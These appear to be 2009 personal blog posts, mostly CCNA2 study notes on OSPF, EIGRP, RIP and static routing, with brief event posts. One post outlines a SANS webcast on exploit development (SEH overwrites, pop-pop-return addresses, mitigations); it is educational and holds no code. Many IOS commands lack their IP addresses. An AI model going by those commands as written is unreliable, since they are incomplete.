Router(config-if)#cdp enable
Router(config-if)#no cdp enable
Router(config)#no cdp run

R1(config)#router ospf 1

Router(config-router)#network network-address wildcard-mask area area-id
Router(config-router)#network area 0

Router(config-router)#router-id ip-address
Router#clear ip ospf process // modify router id detection OR reload the router

Router(config)#interfaceloopback number
Router(config-if)#ip address ip-address subnet-mask

Router(config)#interface loopback 0
Router(config-if)#ip address


Router(config-if)#bandwidth bandwidth-kbps
Router(config-if)#bandwidth 56


Router(config-if)#ip ospf cost 1562 //bypass the calcultion but input the direct value


Router(config-if)#ip ospf priority {0 - 255} //to set the DR or BDR

Router(config-if)#ip ospf hello-interval seconds
Router(config-if)#ip ospf dead-interval seconds

R1(config)#ip route loopback 1 //default route

R1(config-router)#auto-cost reference-bandwidth ? //1-4294967 The reference bandwidth in terms of Mbits per second

R1(config-router)#auto-cost reference-bandwidth 10000

R1#show ip protocols
R1#show ip ospf neighbor
R1#show ip ospf
R1#show ip ospf interface serial /0/0/0

Wednesday, October 21, 2009

Tuesday, October 20, 2009

CCNA2 Chapter 10-11 note

Chap 10 Link state protocol

The IP link-state routing protocols are shown in the figure:
Open Shortest Path First (OSPF)
Intermediate System-to-Intermediate System (IS-IS)

Basic OSPF operations can be configured with a router ospfprocess-id command and a network statement.

Each router floods the LSP to all neighbors, who then store all LSPs received in a database

Each router learns about its own links, its own directly connected networks

the interface must be properly configured with an IP address and subnet mask and the link must be in the up state

An LSP only needs to be sent:
During initial startup of the router or of the routing protocol process on that router
Whenever there is a change in the topology, including a link going down or coming up, or a neighbor adjacency being established or broken

Note: The actual SPF algorithm determines the shortest path as it is building the SPF tree.

Note: OSPF routers do flood the own link-states every 30 minutes. This is known as a paranoid update and is discussed in the following chapter. Also, not all distance vector routing protocols send periodic updates. RIP and IGRP send periodic updates; however, EIGRP does not.

when there is a change in the topology, only those routers in the affected area receive the LSP and run the SPF algorithm.

Link-state routing protocols typically require more memory, more CPU processing, and at times more bandwidth than distance vector routing protocols.
1. Each router learns about its own directly connected networks.

2. Each router is responsible for "saying hello" to its neighbors on directly connected networks.

3. Each router builds a Link-State Packet (LSP) containing the state of each directly connected link.

4. Each router floods the LSP to all neighbors, who then store all LSPs received in a database.

5. Each router uses the database to construct a complete map of the topology and computes the best path to each destination network.

Each router determines its own link-states and floods the information to all other routers in the area. As a result, each router builds a link-state database (LSDB) containing the link-state information from all other routers. Each router will have identical LSDBs. Using the information in the LSDB, each router will run the SPF algorithm. The SPF algorithm will create an SPF tree, with the router at the root of the tree. As each link is connected to other links, the SPF tree is created. Once the SPF tree is completed, the router can determine on its own the best path to each network in the tree.

link-state routing protocol will faster convergence (EIGRP is an expeption)


Chapter 11 OSPF

By default, OSPF Hello packets are sent every 10 seconds on multiaccess and point-to-point segments and every 30 seconds on non-broadcast multiaccess (NBMA) segments (Frame Relay, X.25, ATM).

In most cases, OSPF Hello packets are sent as multicast to an address reserved for ALLSPFRouters at

The Dead interval is the period, expressed in seconds, that the router will wait to receive a Hello packet before declaring the neighbor "down." Cisco uses a default of four times the Hello interval. For multiaccess and point-to-point segments, this period is 40 seconds. For NBMA networks, the Dead interval is 120 seconds

To reduce the amount of OSPF traffic on multiaccess networks, OSPF elects a Designated Router (DR) and Backup Designated Router (BDR).

An LSU contains one or more LSAs and either term can be used to refer to link-state information propagated by OSPF routers.

OSPF is enabled with the router ospf process-id global configuration command. The process-id is a number between 1 and 65535 and is chosen by the network administrator. The process-id is locally significant, which means that it does not have to match other OSPF routers in order to establish adjacencies with those neighbors. This differs from EIGRP. The EIGRP process ID or autonomous system n-mber does need to match for two EIGRP neighbors to become adjacent.

R1(config)#router ospf 1

Router(config-router)#network network-address wildcard-mask area area-id

#network area 0

Unlike EIGRP, however, OSPF requires the wildcard mask

Although any area-id can be used, it is good practice to use an area-id of 0 with single-area OSPF.

The OSPF router ID is used to uniquely identify each router in the OSPF routing domain. A router ID is simply an IP address. Cisco routers derive the router ID based on three criteria and with the following precedence:

1. Use the IP address configured with the OSPF router-id command.

2. If the router-id is not configured, the router chooses highest IP address of any of its loopback interfaces.

3. If no loopback interfaces are configured, the router chooses highest active IP address of any of its physical interfaces.

R3:, which is higher than either or

One command you can use to verify the current router ID is show ip protocols.

Router(config)#interfaceloopback number
Router(config-if)#ip addressip-address subnet-mask

Router(config)#interface loopback 0
Router(config-if)#ip add

The advantage of using a loopback interface is that - unlike physical interfaces - it cannot fail. There are no actual cables or adjacent devices on which the loopback interface depends for being in the up state.

Router(config)#router ospfprocess-id

Modifying the Router ID

The router ID is selected when OSPF is configured with its first OSPF network command. If the OSPF router-id command or the loopback address is configured after the OSPF network command, the router ID will be derived from the interface with the highest active IP address.

The router ID can be modified with the IP address from a subsequent OSPF router-id command by reloading the router or by using the following command:

Router#clear ip ospf process

R1#show ip ospf neighbor
command can be used to verify that the router has formed an adjacency with its neighboring routers

Two routers may not form an OSPF adjacency if:
The subnet masks do not match, causing the routers to be on separate networks.
OSPF Hello or Dead Timers do not match.
OSPF Network Types do not match.
There is a missing or incorrect OSPF network command.

The SPF algorithm is CPU-intensive and the time it takes for calculation depends on the size of the area. The size of an area is measured by the number of routers and the size of the link-state database.

A network that cycles between an up state and a down state is referred to as a flapping link. A flapping link can cause OSPF routers in an area to constantly recalculate the SPF algorithm, preventing proper convergence. To minimize this problem, the router waits 5 seconds (5000 msecs) after receiving an LSU before running the SPF algorithm. This is known as the SPF schedule delay. In order to prevent a router from constantly running the SPF algorithm, there is an additional Hold Time of 10 seconds (10000 msecs). The router waits 10 seconds after running the SPF algorithm before rerunning the algorithm again.

#show ip protocols
#show ip ospf
#show ip ospf interface serial /0/0/0

OSPF may have different Hello and Dead intervals on various interfaces, but for OSPF routers to become neighbors, their OSPF Hello and Dead intervals must be identical. For example, in the figure, R1 is using a Hello interval of 10 and a Dead interval of 40 on the Serial 0/0/0 interface. R2 must also use the same intervals on its Serial 0/0/0 interface or the two routers will not form an adjacency.

Unlike RIPv2 and EIGRP, OSPF does not automatically summarize at major network boundaries.

Loopback interfaces counts as a directed connected network as it is not advertise in OSPF

OSPF metric
The reference bandwidth defaults to 10 to the 8th power, 100,000,000 bps or 100 Mbps. This results in interfaces with a bandwidth of 100 Mbps and higher having the same OSPF cost of 1. The reference bandwidth can be modified to accommodate networks with links faster than 100,000,000 bps (100 Mbps) using the OSPF command auto-cost reference-bandwidth

The cost of an OSPF route is the accumulated value from one router to the destination network.

Cisco routers, the bandwidth value on many serial interfaces defaults to T1 (1.544 Mbps). However, some serial interfaces may default to 128 kbps.

Never assume that OSPF is using any particular bandwidth value. Always check the default value with the show interface command.

show interface command to view the bandwidth value used for an interface

Router(config-if)#bandwidth bandwidth-kbps

The figure shows the bandwidth commands used to modify the costs of all the serial interfaces in the topology.


R1(config-if)#ip ospf cost 1562

The main difference between the two commands is that the bandwidth command uses the result of the cost calculation to determine the cost of the link. The ip ospf cost command bypasses this calculation by directly setting the cost of the link to a specific value.

Multiaccess networks can create two challenges for OSPF regarding the flooding of LSAs:

1. Creation of multiple adjacencies, one adjacency for every pair of routers.

2. Extensive flooding of LSAs (Link-State Advertisements).

The solution to managing the number of adjacencies and the flooding of LSAs on a multiaccess network is the Designated Router (DR).

DROthers only send their LSAs to the DR and BDR using the multicast address (ALLDRouters - All DR routers).

The end result is that there is only one router doing all of the flooding of all LSAs in the multiaccess network.

How do the DR and BDR get elected? The following criteria are applied:

1. DR: Router with the highest OSPF interface priority.

2. BDR: Router with the second highest OSPF interface priority.

3. If OSPF interface priorities are equal, the highest router ID is used to break the tie.

When two DROther routers form a neighbor adjacency, the neighbor state is displayed as 2WAY.

The DR and BDR election process takes place as soon as the first router with an OSPF enabled interface is active on the multiaccess network. This can happen when the routers are powered-on or when the OSPF network command for that interface is configured.

If a new router enters the network after the DR and BDR have been elected, it will not become the DR or the BDR even if it has a higher OSPF interface priority or router ID than the current DR or BDR. The current DR and BDR must both fail before the new router can be elected DR or BDR.

A previous DR does not regain DR status if it returns to the network.

So, how do you make sure that the routers you want to be DR and BDR win the election? Without further configurations, the solution is to either:
Boot up the DR first, followed by the BDR, and then boot all other routers, or
Shut down the interface on all routers, followed by a no shutdown on the DR, then the BDR, and then all other routers.

Instead of relying on the router ID to decide which routers are elected the DR and BDR, it is better to control the election of these routers with the ip ospf priority interface command.

Router(config-if)#ip ospf priority {0 - 255}

But if you change the default value from 1 to a higher value, the router with the highest priority will become the DR and the router with the next highest priority will become the BDR. A value of 0 makes the router ineligible to become a DR or BDR.

After doing a shutdown and a no shutdown on the FastEthernet 0/0 interfaces of all three routers, we see the result of the change of OSPF interface priorities.

in OSPF terminology, the router located between an OSPF routing domain and a non-OSPF network is called the Autonomous System Boundary Router (ASBR).

Static Default Configuration

R1(config)#ip route loopback 1

Like RIP, OSPF requires the use of the default-information originate command to advertise the static

Therefore, 100,000,000 is the default bandwidth referenced when the actual bandwidth is converted into a cost metric.

The reference bandwidth can be modified to accommodate these faster links by using the OSPF command auto-cost reference-bandwidth.

R1(config-router)#auto-cost reference-bandwidth ?
1-4294967 The reference bandwidth in terms of Mbits per second

R1(config-router)#auto-cost reference-bandwidth 10000

Router(config-if)#ip ospf hello-interval  seconds
Router(config-if)#ip ospf dead-interval seconds

Monday, October 19, 2009

CCNA2 Chapter 7-9 note

Chapter 7 RIP2
Some of these enhanced features include:
Next-hop addresses included in the routing updates
Use of multicast addresses in sending updates
Authentication option available

R2(config-router)#redistribute static
we want the RIP process on R2 to redistribute our static route ( by importing the route into RIP and then sending it to R1 and R3 using the RIP process.

R2(config)#ip route Null0

The address space represented by the static summary route does not actually exist. In order to simulate this static route, we use a null interface as the exit interface.

RIPv1 cannot support discontiguous networks, VLSM, or Classless Inter-Domain Routing (CIDR) supernets.
The autosumarization sometime will be the big problem for the routing table

RIPv1 either summarizes the subnets to the classful boundary or uses the subnet mask of the outgoing interface to determine which subnets to advertise.

all subnets must use the same subnet mask when a classful routing protocol is implemented in the network. If the subnets mask not the same, the route wont send or updates to other router.

R1(config)#router rip
R1(config-router)#version 2
R1(config-router)#version 1

By default, RIPv2 automatically summarizes networks at major network boundaries, just like RIPv1.

R1(config-router)#no auto-summary

This command important! Automatic summarization must be disabled to support discontiguous networks. After this, the route will send updates with individual subnet mask.

debug ip rip

A supernet is a block of contiguous classful networks that is addressed as a single network.

Supernets have masks that are smaller than the classful mask (/16 here, instead of the classful /24).

What is the default behaviour of RIP if no version type specified?
-send version 1 updates only, receive version 1 and updates

tip: remember if RIP1, and it using VLSM, the 1st thing is to "version 2"

The maximum network parameter permitted by default of RIPv2 is 15

A discontiguous network will have two or more subnetworks of a classful network connected together by different classful networks. It occurs when a classful major network address , such as, is seperated by one or more other major networks, like


Chapter 8 Routing Table

Level 1 route is a route with a subnet mask equal to or less than the classful mask of the network address.

A level 1 route can function as a:
Default route - A default route is a static route with the address
Supernet route - A supernet route is a network address with a mask less than the classful mask.
Network route - A network route is a route that has a subnet mask equal to that of the classful mask.

An ultimate route is a route that includes:
either a next-hop IP address (another path)
and/or an exit interface

A level 1 parent route is a network route that does not contain a next-hop IP address or exit interface for any network.

A parent route is actually a heading that indicates the presence of level 2 routes, also known as child routes.

A level 2 route is a route that is a subnet of a classful network address.

level 1 parent route exists only when there is at least one level 2 child route.

Regardless of the addressing scheme used by the network (classless or classful), the routing table will use a classful scheme.

Step in the route lookup process:
After child route search, it will be :

Classful routing behavior: If classful routing behavior is in effect, terminate the lookup process and drop the packet.

ultimate--> parent-->child--> drop

Classless routing behavior: If classless routing behavior is in effect, continue searching level 1 supernet routes in the routing table for a match, including the default route, if there is one.

ultimate--> parent-->child-->level 1 supernet-->default route--> drop

Remember that the route lookup process will need to do a recursive lookup on any route that references only a next-hop IP address and not an exit interface.

Using VSLM does not change the lookup process.

Routing behaviors
no ip classless
ip classless
ip classless

this 2 commands determine the address lookup behavior of the routing process

In IOS versions 11.3 and later, the command ip classless is the default, implementing a classless route lookup process.

A common error is to assume that a default route will always be used if the router does not have a better route. But for Classful routing behaviors, R2's default route is not examined nor used, although it is a match. This is often a very surprising result when a network administrator does not understand the difference between classful and classless routing behavior.


Chapter 9 EIGRP
The main purpose in Cisco's development of EIGRP was to create a classless version of IGRP.

EIGRP has a default administrative distance of 90 for internal routes and 170 for routes imported from an external source, such as default routes.

These features include:
Reliable Transport Protocol (RTP)
Bounded Updates
Diffusing Update Algorithm (DUAL)
Establishing Adjacencies
Neighbor and Topology Tables

RTP and the tracking of neighbor adjacencies set the stage for the EIGRP workhorse, the Diffusing Update Algorithm (DUAL).

As the computational engine that drives EIGRP, DUAL resides at the center of the routing protocol, guaranteeing loop-free paths and backup paths throughout the routing domain.

Instead of hop count, both IGRP and EIGRP use metrics composed of bandwidth, delay, reliability, and load. By default, both routing protocols use only bandwidth and delay.

Loop-free means that the neighbor does not have a route to the destination network that passes through this router.

EIGRP does not use holddown timers. Instead, loop-free paths are achieved through a system of route calculations (diffusing computations) that are performed in a coordinated fashion among the routers.

EIGRP packet header opcode:
Update (1)
Query (3)
Reply (4)
Hello (5)

In the IP packet header, the protocol field is set to 88 to indicate EIGRP, and the destination address is set to the multicast If the EIGRP packet is encapsulated in an Ethernet frame, the destination MAC address is also a multicast address: 01-00-5E-00-00-0A.

In TLV field, By default, only bandwidth and delay are weighted. Both are equally weighted, therefore, the K1 field for bandwidth and the K3 field for delay are both set to 1. The other K values are set to zero.

The Hold Time is the amount of time the EIGRP neighbor receiving this message should wait before considering the advertising router to be down

If the hold time expires, EIGRP will declare the route as down and DUAL will search for a new path by sending out queries.

The IP External message is used when external routes are imported into the EIGRP routing process.

The Destination field stores the address of the destination network. Although only 24 bits are shown in this figure, this field varies based on the value of the network portion of the 32-bit network address. For example, the network portion of is 10.1. Therefore, the Destination field stores the first 16 bits. Because the minimum length of this field is 24 bits, the remainder of the field is padded with zeros. If a network address is longer than 24 bits (, for example), then the Destination field is extended for another 32 bits (for a total of 56 bits) and the unused bits are padded with zeros.

Protocol dependent modules are responsible for the specific routing tasks for each Network layer protocol.

Reliable RTP requires an acknowledgement to be returned by the receiver to the sender. An unreliable RTP packet does not require an acknowledgement.

Hello packets
normal network - sent every 5 seconds.
nonbroadcast multiaccess network(NBMA) eg X25,Frame relay,ATM T1 - sent 60 second

hold time
normal - 15 second
NBMA - 180 seconds
An autonomous system (AS) is a collection of networks under the administrative control of a single entity that presents a common routing policy to the Internet. In the figure, companies A, B, C, and D are all under the administrative control of ISP1. ISP1 "presents a common routing policy" for all of these companies when advertising routes to ISP2.

The ISP is responsible for the routing of packets within its autonomous system and between other autonomous systems.

Although EIGRP refers to the parameter as an "autonomous-system" number, it actually functions as a process ID. This number is not associated with an autonomous system number discussed previously and can be assigned any 16-bit value.

Router1(config)#router eigrp 1
Router2(config)#router eigrp 1
Router3(config)#router eigrp 1

In order to establish neighbor adjacencies, EIGRP requires all routers in the same routing domain to be configured with the same process ID.

The autonomous system parameter is a number chosen by the network administrator between 1 and 65535

To configure EIGRP to advertise specific subnets only, use the wildcard-mask option with the network command:

Router(config-router)#network network-address [wildcard-mask]

show ip eigrp neighbors

By default, EIGRP automatically summarizes routes at the major network boundary. We can disable the automatic summarization with the "no auto-summary" command, just as we did in RIPv2.

Note: EIGRP automatically includes a null0 summary route as a child route whenever both of following conditions exist:
There is at least one subnet that was learned via EIGRP.
Automatic summarization is enabled.

By default, K1 and K3 are set to 1, and K2, K4, and K5 are set to 0.

Router(config-router)#metric weights tos k1 k2 k3 k4 k5

tos is 0 for eigrp

default mteric = k1*bandwidth + k3*delay

Use the interface command bandwidth to modify the bandwidth metric:

Router(config-if)#bandwidth kilobits

That bandwidth is used for the (10,000,000/bandwidth) * 256 portion of the formula. Next, determine the delay value for each outgoing interface on the way to the destination. Sum the delay values and divide by 10 (sum of delay/10) and then multiply by 256 (* 256). Add the bandwidth and sum of delay values to obtain the EIGRP metric.

EIGRP uses the slowest bandwidth in its metric calculation
EIGRP uses the cumulative sum of delay metrics of all of the outgoing interfaces.

DUAL determines the best loop-free path and loop-free backup paths.

The feasibility condition (FC) is met when a neighbor's reported distance (RD) to a network is less than the local router's feasible distance to the same destination network. (refer to the screenshot)

R2#show ip eigrp topology
more specific
R2#show ip eigrp topology

A feasible successor (FS) is a neighbor who has a loop-free backup path to the same network as the successor by satisfying the feasibility condition.

The show ip eigrp topology all-links command shows all possible paths to a network including successors, feasible successors, and even those routes that are not feasible successors

This finite state machine contains all of the logic used to calculate and compare routes in an EIGRP network.

#debug eigrp fsm

When the successor is no longer available and there is no feasible successor, DUAL will put the route into active state. . DUAL will send EIGRP queries asking other routers for a path to this network.

The Null0 summary:
Regardless of whether classful or classless routing behavior is being used, the null0 summary will be used and therefore denying the use of any supernet or default route.

example :Even if a default route was configured, R1 would still discard the packet because it matches the Null0 summary route to

To establish EIGRP manual summarization on all interfaces that send EIGRP packets, use the following interface command:

Router(config-if)#ip summary-address eigrp  as-number network-address subnet-mask

Because R3 has two EIGRP neighbors, the EIGRP manual summarization in configured on both Serial 0/0/0 and Serial 0/0/1.

EIGRP requires the use of the redistribute static command to include this static default route with its EIGRP routing updates.

Note: There is another method to propagate a default route in EIGRP, using the ip default-network comman

Router(config-if)#ip bandwidth-percent eigrp as-number percent
used to configure the percentage of bandwidth that may be used by EIGRP on an interface.

In our example, if bandwidtth is 64kbps,we are limiting EIGRP to no more than 50 percent of the link's bandwidth. Therefore, EIGRP will never use more the 32kbps of the link's bandwidth for EIGRP packet traffic.

Router(config-if)#ip hello-interval eigrp as-number seconds

If you change the hello interval, make sure that you also change the hold time to a value equal to or greater than the hello interval

Router(config-if)#ip hold-time eigrp as-number seconds

What is the purpose of EIGRP neighbor and topology table ?
the neighbour and topology tables are used by DUAL to building table

topology table : tables that contains successor and feasible successor

routing table: contain succssors only

Friday, October 2, 2009

Tuesday, September 29, 2009

Linux Varsiti @ Universiti Teknologi Malaysia 2009 - 5th Oct 2009

Linux Varsiti Edisi Selatan (Johor)

Linux Varsiti is a programme that aimed to bring Open Source Software to tertiary education institute in Malaysia.

Date: Monday, October 5, 2009
Time: 9:00am - 6:30pm
Location: Universiti Teknologi Malaysia
Street: Jalan Universiti
City/Town: Skudai, Malaysia

Tentative :

1. Introduction to Open Source Software
2. Facebook Developer Garage Program
3. GIMP vs Photoshop
4. Basic Installation of Linux Distro
5. Career Opportunity in OSS

More information

Join LinuxVarsiti in Facebook.

Saturday, September 26, 2009

The 2009 Virtual Conference on Information Security

Two days back, I attended " The 2009 Virtual Conference on Information Security" which organised by Infosecurity Magazine. Indeed it was a brand new experience as the conference was totally on virtual as the whole involvement has done only in front of my desktop. There was several webninars at the Keynote Theathre which broadcasted live for 7 hours and I managed to catch up with a few.

One interesting point was the conference delegate may visit the Exhibit Hall. The virtual booth unit has included Trend Micro, Sysbase, Overtis, LANDesk, Webroot,PGP, Check Point and Info Security. We may obtain some white paper, brocheru and techinical paper by just click the the "save to briefcase" button. The resources will be saved in our conference bag and we can download it afterward.

Great experience! Unfortunately the recorded video sessions yet to download for the moment. Wish that it will be up soon.

Screen shoots:

Main hall

The Exhibit Hall

The Keynote Theater

Sunday, September 20, 2009

SANS webcast - Developing exploits

SEC709 Developing Exploits for Penetration Tester and Security

From Stephen Sims

Precompile framework
-core impact
-immunity canvas

code analysis
code scanning tool,gcar lcar
(not really catch the application name he mentioned such as gcar and lcar)

Debugger : immunity debugger

OS monitoring tools
-ProcMon, RegMon,FileMon,RegShot

What happen during the crash?
-Analysis the status of each register
eg , strange 0x41414141 if the input is A
-is the Return Pointer or SEH chain overwritten?
analysis the stack segment and monitor ESP/EBP
-are heap overwritten?
analysis dynamic memory allocation

Tool : findjump kernel32.dll edx
-get pop-pop-return address

Several protection

-protect SEH pointer again overwrite

-randomises the location of libraries and memory segment

-prevent code execution on stack and heap

Security cookies
-pushes unique values onto the stack and heap during allocations which are

checked upon exit or free

Useful screenshot

Sunday, September 13, 2009

CCNA2 Chapter 5 - 6 note

Finish another 2 chapters.

My note


Chapter 5 RIPv1

RIP messages are encapsulated in a UDP segment, with source and destination ports of 520.

One RIP update can contain up to 25 route entries. The maximum datagram size is 512 bytes, not including the IP or UDP headers.

To enter the router configuration mode for RIP, enter 'router rip' at the global configuration prompt.

debug ip rip
undebug all

The correct solution is to use the passive-interface command, which prevents the transmission of routing updates through a router interface but still allows that network to be advertised to other routers. Enter the passive-interface command in router configuration mode.

Router(config-router)#passive-interface interface-type interface-number

This command stops routing updates out the specified interface. However, the network that the specified interface belongs to will still be advertised in routing updates that are sent out other interfaces.

RIP is a classful routing protocol that automatically summarizes classful networks across major network boundaries

classless routing protocols like RIPv2 allow the same major (classful) network to use different subnet masks on different subnets, better known as Variable Length Subnet Masking (VLSM).

How does R2 know that this subnet has a /24 ( subnet mask?
R2 uses its own subnet mask on this interface and applies it to this and all other subnets that it receives on this interface

RIPv1 lack of support for discontiguous networks. It may make load balancing between 2 discontinous network

'default-information originate' - specify that this router is to originate default information, by propagating the static default route in RIP updates.

you can see that there is a candidate default route, as denoted by the R* code. The static default route on R2 has been propagated to R1 in a RIP update. R1 has connectivity to the LAN on R3 and any destination on the Internet.


Chapter 6 VLSM

CIDR uses Variable Length Subnet Masks (VLSM) to allocate IP addresses to subnets according to individual need rather than by class.

As you most likely recall, VLSM is simply subnetting a subnet. VLSM can be thought of as sub-subnetting.

As you previously learned, route summarization also known as route aggregation, is the process of advertising a contiguous set of addresses as a single address with a less-specific, shorter subnet mask. Remember that CIDR is a form of route summarization and is synonymous with the term supernetting.

CIDR allows for supernetting. A supernet is a group of major network addresses summarized as a single network address with a mask less than that of the default classful mask.

Supernetting refers to the ability to sumarise networks less than the classfull default mask.

Saturday, September 12, 2009

CCNA2 Chapter 1 - 4 note

Note :

Chapter 1 Introduction to Routing

nvram - startup file
flask - cisco IOS

enable password and enable secret password not need to exist together. If only enable secret password, it already enof

important, if without this line, the user will be granted access to the line without entering a password.

Router#copy running-config startup-config

RIP (Routing Information Protocol)
IGRP (Interior Gateway Routing Protocol)
EIGRP (Enhanced Interior Gateway Routing Protocol)
OSPF (Open Shortest Path First)
IS-IS (Intermediate System-to-Intermediate System)
BGP (Border Gateway Protocol)

Note: RIP (versions 1 and 2), EIGRP, and OSPF are discussed in this course. EIGRP and OSPF are also explained in more detail in CCNP, along with IS-IS and BGP. IGRP is a legacy routing protocol and has been replaced by EIGRP. Both IGRP and EIGRP are Cisco proprietary routing protocols, whereas all other routing protocols listed are standard, non-proprietary protocols.

As a packet is forwarded from router to router, the Layer 3 source and destination IP addresses will not change; however, the Layer 2 source and destination data link addresses will change. This process will be examined more closely later in this section.

Best path for RIP - hop count
Best path for OSPF - bandwidth of the link


Chapter 2 Static routing

Two types of cables can be used with Ethernet LAN interfaces:
A straight-through, or patch cable, with the order of the colored pins the same on each end of the cable
A crossover cable, with pin 1 connected to pin 3, and pin 2 connected to pin 6

Straight-through cables are used for:

Crossover cables are used for:

#show ip interface brief
#show interface fastethernet 0/0

Typically, the router is the DTE device and is connected to a CSU/DSU, which is the DCE device. The CSU/DSU (DCE device) is used to convert the data from the router (DTE device) into a form acceptable to the WAN service provider.

Although Cisco serial interfaces are DTE devices by default, they can be configured as DCE devices.

To configure a router to be the DCE device:

1. Connect the DCE end of the cable to the serial interface.

2. Configure the clock signal on the serial interface using the clock rate command.

!!! Note: If a router's interface with a DTE cable is configured with the clock rate command, the IOS will disregard the command and there will be no ill effects.

A stub network is a network accessed by a single route.

R1(config)#ip route

( is at priv mode, not at line mode)

recursive lookup
- We will see in the next section that static routes can be configured with an exit interface. This means that they do not need to be resolve using another route entry.
- if in static route, the exit interface column is 'IP', recursive lookup need to be done to get the exit interface
- if the exit interface is 'fa 0/0' or 'serial 0/0/0', x recursive lookup

There is an advantage to utilizing exit interfaces in static routes for both serial point-to-point and Ethernet outbound networks. The routing table process only has to perform a single lookup to find the exit interface instead of a second lookup to resolve a next-hop address.

What are the most common metrics used in IP dynamic routing?
Hop count,bandwidth, delay and cost

Default route
The key to this configuration is the /0 mask.
Default routes are very common on routers.

The original static route must be remove before add in anything

Exit interface is down
Let's consider what would happen if an exit interface goes down. For example, what would happen to R1's static route to if its Serial 0/0/0 interface went down? If the static route cannot be resolved to an exit interface, in this case Serial 0/0/0, the static route is removed from the routing table.

The rate configured on the DEC determnies the clock rate

A static route that points to the next hop IP will have 1 administrative distance and metric 0


Chapter 3 Intro to dynamic routing protocols

BGP is typically used between ISPs and sometimes between a company and an ISP.

Distance vector protocols work best in situations where:
The network is simple and flat and does not require a special hierarchical design.
The administrators do not have enough knowledge to configure and troubleshoot link-state protocols.
Specific types of networks, such as hub-and-spoke networks, are being implemented.
Worst-case convergence times in a network are not a concern.

In contrast to distance vector routing protocol operation, a router configured with a link-state routing protocol can create a "complete view" or topology of the network by gathering information from all of the other routers.

Link-state routing protocols do not use periodic updates. After the network has converged, a link-state update only sent when there is a change in the topology.

Link-state protocols work best in situations where:
The network design is hierarchical, usually occurring in large networks.
The administrators have a good knowledge of the implemented link-state routing protocol.
Fast convergence of the network is crucial.

Classful routing protocols include RIPv1 and IGRP

Classless routing protocols are RIPv2, EIGRP, OSPF, IS-IS, BGP.

Generally, RIP and IGRP are slow to converge, whereas EIGRP and OSPF are faster to converge.

Each routing protocol uses its own metric. For example, RIP uses hop count, ,IGRP and EIGRP uses a combination of bandwidth and delay, and Cisco's implementation of OSPF uses bandwidth.

All the routing protocols discussed in this course are capable of automatically load balancing traffic for up to four equal-cost routes by default. EIGRP is also capable of load balancing across unequal-cost paths.

Administrative distance (AD) defines the preference of a routing source.
Only a directly connected network has an administrative distance of 0, which cannot be changed.
static route - AD 1

To see the AD value of a directly connected network, use the [route] option.

at 'show ip route', Administrative distance/hop

EIGRP internal route has the most trustworthy administrative distance by default

How many equal cost paths can a dynamic routing protocol use for load balancing by default? 4

when do directly connected networks appear in the routing table? as soon as they addressed and operational at layer 3

20 - eBGP
90- EIGRP (internal)
170 -EIGRP (external)
120 - RIP


Chapter 4 Distance Vector Routing Protocol

Periodic Updates are sent at regular intervals (30 seconds for RIP and 90 seconds for IGRP).

Distance vector routing protocols share certain characteristic :
periodic updates
broadcast updates
entire routing table updates

invalid timer : 180s
flush timer : 240s
holddown timer : 180s

Holddown Timer. This timer stabilizes routing information and helps prevent routing loops during periods when the topology is converging on new information. Once a route is marked as unreachable, it must stay in holddown long enough for all routers in the topology to learn about the unreachable network. By default, the holddown timer is set for 180 seconds.

EIGRP uses updates that are:
Non-periodic because they are not sent out on a regular basis.
Partial updates sent only when there is a change in topology that influences routing information.
Bounded, meaning the propagation of partial updates are automatically bounded so that only those routers that need the information are updated.

Note: Collisions are only an issue with hubs and not with switches.

To prevent the synchronization of updates between routers, the Cisco IOS uses a random variable, called RIP_JITTER,

Distance vector routing protocols are simple in their operations. Their simplicity results in protocol drawbacks like routing loops.

There are a number of mechanisms available to eliminate routing loops, primarily with distance vector routing protocols. These mechanisms include:
Defining a maximum metric to prevent count to infinity
Holddown timers
Split horizon
Route poisoning or poison reverse
Triggered updates

Holddown timers are used to prevent regular update messages from inappropriately reinstating a route that may have gone bad

Holddown timers also help prevent the count to infinity condition.

The split horizon rule says that a router should not advertise a network through the interface from which the update came.

Route poisoning is used to mark the route as unreachable in a routing update that is sent to other routers.

Route poisoning speeds up the convergence process as the information about spreads through the network more quickly than waiting for the hop count to reach "infinity".

Note: Split horizon is enabled by default. However split horizon with poison reverse may not be the default on all IOS implementations.

Features of RIP:
Supports split horizon and split horizon with poison reverse to prevents loops.
Is capable of load balancing up to six equal cost paths . The default is four equal cost paths.

EIGRP features include:
Triggered updates (EIGRP has no periodic updates).
Use of a topology table to maintain all the routes received from neighbors (not only the best paths).
Establishment of adjacencies with neighboring routers using the EIGRP hello protocol.
Support for VLSM and manual route summarization. These allow EIGRP to create hierarchically structured large networks.

RIP and IGRP are distance verctor routing protocols characterized by periodic updates that are broadcast to directly connected neighbours. The entire routing table is sent in the updat.

Three router running a distance-vector routing protocols lost all power, including the baterry backups. When router reload, they will send updates that include only directly connected routes to their directly connected neighbours.

(All note taken from CCNA2 Exploration)